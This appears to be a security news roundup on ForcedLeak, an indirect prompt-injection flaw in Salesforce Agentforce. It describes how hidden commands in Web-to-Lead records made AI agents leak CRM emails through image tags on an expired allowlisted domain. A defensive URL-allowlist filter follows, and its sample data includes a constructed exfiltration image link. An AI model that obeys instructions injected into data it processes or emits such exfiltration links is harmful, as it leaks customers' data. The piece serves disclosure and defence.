CyberNews: 28/09/2025 Edition
Today’s roundup
Summary
Security researchers at Noma Labs disclosed a critical vulnerability (CVSS 9.4) in Salesforce Agentforce dubbed ForcedLeak, enabling attackers to exfiltrate CRM data through indirect prompt injection attacks. The flaw specifically affected organizations using Salesforce’s Web-to-Lead functionality, where malicious actors could exploit the 42,000-character Description field to embed hidden commands. Attackers bypassed Salesforce’s Content Security Policy via an expired whitelisted domain, triggering unauthorized data leaks when AI agents processed poisoned lead records. Proof-of-concept attacks demonstrated how exfiltrated email addresses were encoded and transmitted via attacker-controlled image tags. Salesforce addressed the vulnerability on September 8, 2025, by enforcing strict URL allowlisting for AI model interactions. The disclosure timeline shows Noma Labs reported the flaw on July 28, with patches implemented six weeks later following coordinated disclosure.
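The mitigation described above, strict URL allowlisting for what an agent is allowed to render or fetch, as an added example that is not Salesforce’s code: a Python filter that drops image references whose host is not on an allowlist (the allowlist, hostnames and sample agent output are constructed). It goes slightly beyond the case in the text by also rejecting IP literals, non-http schemes and userinfo spoofing of the host.

```python
"""Strict outbound-URL allowlist for image references in LLM agent output.
Added example, not Salesforce's code; hostnames below are constructed."""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample: an agent response that rendered a poisoned lead record.
ALLOWED_HOSTS = {"salesforce-assets.example"}          # assumed allowlist
SAMPLE_AGENT_OUTPUT = (
    "Lead summary for Acme.\n"
    "![logo](https://cdn.salesforce-assets.example/logo.png)\n"
    "![x](https://old-cdn.example/c.png?e=am9lQGV4YW1wbGUuY29t)\n"  # exfil tag
)

# Markdown ![alt](url "title") and HTML <img ... src="url" ...> references.
_IMG_RE = re.compile(
    r'!\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)'
    r'|<img\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\'][^>]*>',
    re.IGNORECASE,
)

def host_allowed(url: str, allowed_hosts: set[str]) -> bool:
    """True only for http(s) URLs whose host is an allowlisted name or a
    subdomain of one. urlsplit().hostname ignores userinfo and port, so
    'https://good.example@evil.example/' resolves to evil.example.
    Raw IP literals are rejected outright."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:
        return False
    if parts.scheme.lower() not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    try:
        ipaddress.ip_address(host)
        return False            # IP literal: never a named, allowlisted host
    except ValueError:
        pass
    return any(host == a or host.endswith("." + a) for a in allowed_hosts)

def strip_unallowed_images(text: str, allowed_hosts: set[str]) -> tuple[str, list[str]]:
    """Replace image references to non-allowlisted hosts with a marker.
    Returns (sanitized_text, blocked_urls) so blocked URLs can be logged."""
    blocked: list[str] = []
    def repl(m: re.Match) -> str:
        url = m.group(1) or m.group(2)
        if host_allowed(url, allowed_hosts):
            return m.group(0)
        blocked.append(url)
        return "[image removed: host not allowlisted]"
    return _IMG_RE.sub(repl, text), blocked
```

Run `strip_unallowed_images(SAMPLE_AGENT_OUTPUT, ALLOWED_HOSTS)` to see the second image tag replaced and its URL returned in the blocked list for logging.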